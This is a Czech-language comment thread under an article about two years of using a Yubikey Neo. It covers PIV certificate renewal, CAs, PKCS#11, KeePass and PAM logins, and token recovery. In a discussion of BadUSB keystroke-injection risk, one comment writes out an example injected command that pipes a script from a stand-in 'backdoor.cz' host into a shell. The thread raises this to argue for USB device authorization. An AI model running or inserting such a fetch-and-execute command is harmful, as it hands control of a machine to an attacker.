Názory k článku Yubikey Neo po dvou letech

PIV rozlišuje 4 druhy klíčů, nebo umí uložit právě čtyři klíče? Pokud to druhé, nedokážu si představit, jak se mění certifikáty.

S obecnými PKCS11 kartami se nechá starý, kterému platnost ještě nevypršela, a přidá se nový. Takže uživateli autentizace funguje, i když se ještě nestihl rozšířit identifikátor nového certifikátu do autorizačních systémů.

Nebo v rámci zbohatnutí výrobců PIV karet si uživatel musí pořídit druhé zařízení, řešit jeho inicializaci, nastavování PINu a pak si pamatovat, které zařízení je které?

Mně jako jednodušší řešení přijde obdoba používaná u serverových certifikátů - nějaký týden před vypršením se vygeneruje nový certifikát s platností od momentu vzniku a ním se nahradí starý na PIV appletu/kartě.

Pokud to už chcete řešit ve větším měřítku, tak je rovnou dobré si ty cerifikáty podepisovat svou vlastní CA a pak nenarazíte na problém, že se nový certifikát nerozšířil do autorizačních systémů.

Jinak přinejhorším šlo použít slot 9c jako extra místo pro další certifikát a klíč. Myslím, že běžné PKCS#11 aplikace to normálně nerozlišují (klíč akorát musí správný flag - "sign", "encrypt", podle aplikace).

Samozřejmě, že se certifikát vydá před vypršením platnosti starého. Jenže certifikát nevyrobíte bez soukromého klíče. A když máte požadavky, že klíč nesmí opustit kartu, tak jej musíte vygenerovat na kartě. A když karta není schopna pojmout více jak jeden klíč, tak musíte smazat nejprve starý.

Taky ve větším měřítku se nepoužívají vlastní autority, ale akreditované veřejné autority. Tam pak musíte po vydání certifikátu distribuovat sériová čísla certifikátů do všelijakých nezávislých informačních systémů. Pak se nevyhnete období, že máte certifikát, ale ne všichni vědí, koho prokazuje.

Můj pocit z PIV je, že je to taková nabušená průkazka, kdy zaměstnanec vyfasuje každý rok novou kartu se zaměstnavatelem před­generovaným certifikátem. Smyslem není chránit zaměstnance, ale zaměstnavatele.

Jinak u PKCS#11 můžete mít klíčů, kolik chcete. Omezením je jen velikost paměti v kartě. V případě PKCS#15 dokonce můžete mít skupiny klíčů chráněné různým PINem.

V případě RSA na nový veřejný klíč potřebujete nový soukromý klíč. Tudíž na nový certifikát potřebujte nový soukromý klíč. Všechno ostatní jsou změkčení, která podkopávají smysl výměny certifikátů nebo přímo porušují bezpečnostní pravidla.

Bohužel ze subjectu certifikátu nepoznáte, komu byl vydán. Různé autority mají různá pravidla a hodnoty různě omezují nebo normalizují. Konfliktní jména (stejnojmenní lidé ze stejné organizační jednotky nebo adresy) autority často řeší ad hoc změnami, které nelze předjímat. Takže ten samý člověk může dostat od dvou autorit certifikáty s jiným jménem. E-mail vypadá lákavě, ale za prvé je nepovinný, za druhé někdo má e-mailovou adresu odpovídající roli, nikoliv jménu.

Yubikey není stejný případ. Yubikey má PIV applet (u nových modelů jej dokonce nemůžete vyměnit nebo přidat si další), což je na stejné úrovni jako PKCS#11 profil. Rozdíl je, že PIV, alespoň v podání Yubikey (hledat specifikaci se mi nechce), má principiální omezení. Karty mají obvykle aspoň 32 KB. Tam se těch certifikátů vejde rozhodně více.

Jenže certifikát nevyrobíte bez soukromého klíče.

Ale vy nepotřebujete privátní klíč té karty pro vygenerování certifikátu. Jenom její veřejný klíč. Který bude součástí CSR (certificate signing request).

Taky ve větším měřítku se nepoužívají vlastní autority, ale akreditované veřejné autority.

Tak to teda absolutně ne. Toto je shodou okolností případ, pro který bylo celé X.509 puvodně vlastně navržené - každá firma má vlastní hierarchii. A vlastní CA.

Jinak u PKCS#11 můžete mít klíčů, kolik chcete.

PKCS#11 je standard pro C interface, takže samozřejmě závisí jen od velikosti karty.

O PKCS#15 jsem mimojiné psal v souvislosti s tokenem Feitian ePass 2003 tady na root článek, který PKCS#15 podporuje.

Jak jsem napsal výše, veřejný klíč je duální soukromému. Jeden bez druhého neexistuje.

Každá firma může mít vlastní CA, ale bez patřičných certifikací vám ji nikdo příčetný neuzná. Rozhodně ne státní správa. Nakonec PIV byl vytovořen pro potřeby americké administrativy (NIST Special Publication 800-73).

Je někde prosím nějaký příklad jak klíč použít? Napadá mě přihlašování k systému a přihlašování ke KeePasu. Šlo by to? Ideál je něco jako přijdu k PC, vložim USB klíč a ten mi odmkne de facto všechny přihlášení, který potřebuju...
...tak k tomu KeePasu jsem našel nějaký popis zde: http://keepass.info/help/kb/yubikey.html

Nejake info o moznostiach priamo na strankach vyrobcu Yubico.

Přihlašovaní k počítači lze nastavit přes PAM modul pam_yubico nebo pam_u2f. Taky lze tak udělat třeba autentizaci na sudo.

Vyčerpávající seznam možností, co s Yubikey udělat, asi pohromadě nikde není. Dobrý rozcestník sem dal diskutující nade mnou. Yubico uvádí navíc možnosti pro business nasazení nebo vývojáře. Na tom developer portálu se nachází asi nejvíc návodů, ale to je spíš pro lidi, co se snaží Yubikey přiohnout svým potřebám.

Pro KeePass mají rovnou návod na Yubico stránkách.

Lze taky najít plugin CryptoKi, který funguje na jiném principu než OtpProvider výše, ale nevím v jakém stadiu podporovanosti se tento plugin nachází.

Je dobrý nápad vystavovat USB port počítače, a strkat do něj zařízení které je potenciálně nedůvěryhodné? To USB zařízení může například přepětím odpálit celý počítač, nebo se identifikovat jako human interface device a poslat stisky kláves, které spustí shell, stáhnou malware a spustí ho.
http://arstechnica.com/security/2015/10/usb-killer-flash-drive-can-fry-your-computers-innards-in-seconds/
http://arstechnica.com/security/2014/07/this-thumbdrive-hacks-computers-badusb-exploit-makes-devices-turn-evil/

Tak snad viem co kde davam, pri tomto stupni paranoje musite uvazovat aj o tom, ze kym ste prec NSA/SIS/atd sa k vam dostanu domov, rozoberu pocitac a napoja sa priamo na dosku. Takze sup sup rychlo vyhodit pocitac urcite je uz napichnuty.

Ten NEO dokonce jako HID funguje a když se používá v režimu hesla nebo OTP, tak na stisk přímo odesílá jako klávesnice to, co by člověk normálně napsal. :-)
Každá věc má své pro a proti...

Pravda, napsat takový prográmek pro arduino leonardo za stovku je triviální, jen na různých distribucích budou různé klávesové zkratky pro spuštění terminálu. Nakonec se jich může vyzkoušet víc :-)

Vystavovat USB porty nahodnym ludom je nebezpecne, ale fyzicky pristup je problem vo vacsine pripadov a ochrana prakticky neexistuje.

Moj vlastny Yubikey sa snad nebude snazit odpalit mi PC. Ked sa k pocitacu dostane niekto iny, tak tam uz riziko je.

Elektrické zničení neovlivníš, ale rozumný operační systém si snad nenechá diktovat příkazy od USB donglu!

Tvůj OS nebere příkazy napsané na USB klávesnici?

Nemám rozumný OS (resp. nějak nebyl čas to nastavit), ale nebral by, dokud bych to nepovolil.

Takže bere, stejně jako na drtivé většině ostatních počítačů. Těch "správně nastavených" asi nebude mnoho...

To je takový problém vyhodit dialogové okno "Připojil jsi něco, co má USB class klávesnice, a napsalo to 'alt+f2 xterm curl backdoor.cz|sh'. Přejete si ji povolit? [Ano] [Ne]"

"Zařízení co má USB class klávesnice napsalo 'Ano'. Přejete si to povolit? [Ano] [Ne]"

Ještě než se tu objeví názor někoho, kdo se nad tím nezamyslel, a napíše „to jako budeš každý den povolovat svoji klávesnici“ a „jak povolím klávesnici, když nemám klávesnici“.

Ad. 1) Samozřejmě že ne. Svoji klávesnici připojuji doma, případně v práci. To je pro notebook poměrně dobře definované, protože se právě probudil, visí to na hubu (přičemž útočník by musel naemulovat hub, myš i klávesnici včetně správných USB ID a pořadí portů) a vidí kolem sebe třeba určité WPA wifi sítě nebo je v ethernetu, kde se může zeptat nějakého vnitřního SSH serveru.

Další možností je koncept, na který přistoupil QubesOS. Počítače mají hodně USB portů a některé prohlásíme za důvěryhodné a některé ne.

Ad. 2) Já mám PS/2, ale řekněme, že nemáte. Mohlo by to třeba akceptovat první klávesnici připojenou při bootu. A abychom se nedostali do deadlocku při výměně klávesnice, bylo by též možné "Pro autorizaci napište na klávesnici nc1y". Pokud by to byla interaktivní klávesnice, mohu ty čtyři klávesy zmáčknout a tím se to potvrdí.

Další možnost je mít desktop s přepínáním různých úrovní zabezpečení, což je stejně rozumné, abyste neměli třeba v ssh-agentovi trvale odemčený SSH klíč od důležitých serverů, i když zrovna jenom kecáte na Rootu. Některá úroveň by pak počítala s připojováním USB zařízení, některá ne.

A jinak na Linuxu se to dá částečně implementovat pomocí options usbcore authorized_de­fault=0 a /sys/zařízení/au­thorized.

ale jak se řeší např. to, když ten token ztratím - příjdu o přístup? Existuje něco jako záložní token?

To je jedna možnost, i když asi dražší - lze přiřadit více tokenů k jednomu účtu (alespoň Google a Yubico to umožňují). U Google účtu lze použít další 2-factor variantu (záložní), např. právě tím Google Authenthicatorem, SMS, nebo jednorázový recovery code. Samozřejmě recovery možnosti se musí nastavit předem.

Každá služba to bude mít řešeno asi jinak.

Podle rychlého průzkumu dalších služeb je typická možnost získat přístup přes recovery kód, sms, nebo mobilní authenthicator.

Přesně v době psaní článku vydalo Yubico další token, Yubikey 4.

Hlavní rozdíl proti Neo je je, že Yubikey 4 umí 4096-bit RSA klíče v OpenPGP appletu, nemá NFC a je levnější o $10. Pokud člověk nepotřebuje použít NFC pro mobilní autentizaci, je asi Yubikey 4 lepší volba než Neo.

Zkoušel někdo to NFC? Funguje to jenom na OTP nebo i na PGP klíče?

Jinak Neo je opravdu pěkná hračka a 4096-bit RSA klíče je dobré, vyslyšeli uživatele...
Nezkoušel to někdo na login/GDM nebo na odemykání obrazovky/scre­ensaver?

NFC s GPG bylo vyzkoušeno (čtečka Omnikey Cardman 5321) a fungovalo, ale osobně bych se na to moc nespoléhal. Je to bohužel jedna z těch věcí, na kterou nikdo nedělá regresní testy, protože to má málo uživatelů.

na www.yubikeys.cz mají oficiální zastoupení. už to někdo zkoušel?

Jj. Objednal jsem si jich pár kousků a vše v pořádku. Cena ok, zboží dorazilo jak má asi za dva dny a všechny yubikeys jsou funkční.